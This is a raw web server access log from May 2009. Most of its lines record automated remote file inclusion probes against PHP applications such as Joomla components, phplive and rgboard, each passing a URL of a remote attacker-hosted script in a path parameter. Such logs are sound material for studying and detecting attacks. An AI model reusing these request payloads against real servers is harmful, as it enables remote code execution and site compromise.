61.81.93.142 - - [30/May/2009:03:08:45 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:03:09:09 -0400] "GET /logs/access_log.Q109051600/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.237.146.58 - - [30/May/2009:03:09:19 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:03:09:19 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:03:09:20 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.76"
218.150.78.203 - - [30/May/2009:03:09:28 -0400] "GET /logs/error_log.Q108030100%20/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
80.237.146.58 - - [30/May/2009:03:09:33 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:03:09:33 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.76"
80.237.146.58 - - [30/May/2009:03:09:33 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bajoid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.76"
201.232.54.48 - - [30/May/2009:03:09:38 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:09:38 -0400] "GET //skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:03:09:38 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.150.78.203 - - [30/May/2009:03:09:45 -0400] "GET /logs/error_log.Q108030100%20/convert/mvcw.php?step=1&vwar_root=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
201.232.54.48 - - [30/May/2009:03:09:58 -0400] "GET /logs/access_log.Q109050700%20%20//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:10:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:03:11:27 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:11:27 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:11:27 -0400] "GET /logs/access_log.Q109051800//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:03:11:54 -0400] "GET /logs/access_log.Q109051100//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:11:55 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:12:17 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:46 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:46 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:46 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:52 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:52 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:12:52 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:03:12:57 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:13:08 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:13:08 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:13:08 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.251.225.77 - - [30/May/2009:03:13:10 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:03:13:11 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:03:13:11 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:03:13:11 -0400] "GET //phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:03:13:11 -0400] "GET /logs//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
203.251.225.77 - - [30/May/2009:03:13:12 -0400] "GET /logs//phplive/help.php?css_path=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
85.18.117.101 - - [30/May/2009:03:13:47 -0400] "GET //?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:13:47 -0400] "GET /logs/access_log.Q109052300%20%20//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:13:47 -0400] "GET /logs//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:13:47 -0400] "GET /logs/access_log.Q109050700%20%20//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:15:15 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:15:16 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:15:16 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:03:15:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94317B1E7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.36.213.166 - - [30/May/2009:03:15:17 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:15:17 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:03:15:18 -0400] "GET /logs/access_log.Q109051100/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:15:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.188.238.2 - - [30/May/2009:03:17:36 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:03:17:36 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:03:17:36 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:18:21 -0400] "GET /logs/access_log.Q109052300//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:18:21 -0400] "GET /logs/access_log.Q109050700//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:18:21 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:18:21 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:18:21 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:25 -0400] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:25 -0400] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:25 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:26 -0400] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:26 -0400] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:27 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:30 -0400] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:30 -0400] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:30 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:49 -0400] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:49 -0400] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:18:49 -0400] "GET /logs/access_log.Q109052300//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:19:02 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:19:02 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:19:02 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:19:24 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
24.94.19.88 - - [30/May/2009:03:19:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
24.94.19.88 - - [30/May/2009:03:19:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
24.94.19.88 - - [30/May/2009:03:19:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
24.94.19.88 - - [30/May/2009:03:19:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
195.34.78.110 - - [30/May/2009:03:20:00 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:03:20:00 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:03:20:00 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:03:20:02 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:03:20:02 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:03:20:02 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:03:20:06 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:03:20:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [30/May/2009:03:20:35 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:21:09 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:03:21:12 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:21:12 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:21:33 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:21:44 -0400] "GET /logs/access_log.Q109052300%20%20//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:21:51 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
218.146.231.193 - - [30/May/2009:03:23:20 -0400] "GET /logs/access_log.Q109052100//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs/access_log.Q109010700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs/access_log.Q108112300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.146.231.193 - - [30/May/2009:03:23:21 -0400] "GET //phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs/access_log.Q109010700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:21 -0400] "GET /logs/access_log.Q108112300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.146.231.193 - - [30/May/2009:03:23:22 -0400] "GET /logs//phplive/help.php?css_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
94.23.200.54 - - [30/May/2009:03:23:22 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:22 -0400] "GET /logs/access_log.Q109010700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:22 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:22 -0400] "GET /logs/access_log.Q108112300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:42 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:42 -0400] "GET /logs/access_log.Q109010700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:42 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
94.23.200.54 - - [30/May/2009:03:23:42 -0400] "GET /logs/access_log.Q108112300%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:23:47 -0400] "GET /logs///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:23:47 -0400] "GET /logs/access_log.Q109051100///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:03:23:47 -0400] "GET ///include/mail.inc.php?skin_board_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:23:52 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:23:52 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3433 "-" "Mozilla/5.0"
112.175.141.41 - - [30/May/2009:03:23:52 -0400] "GET /logs/access_log.Q109052300//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:03:23:56 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:03:23:59 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:24:21 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:03:24:21 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
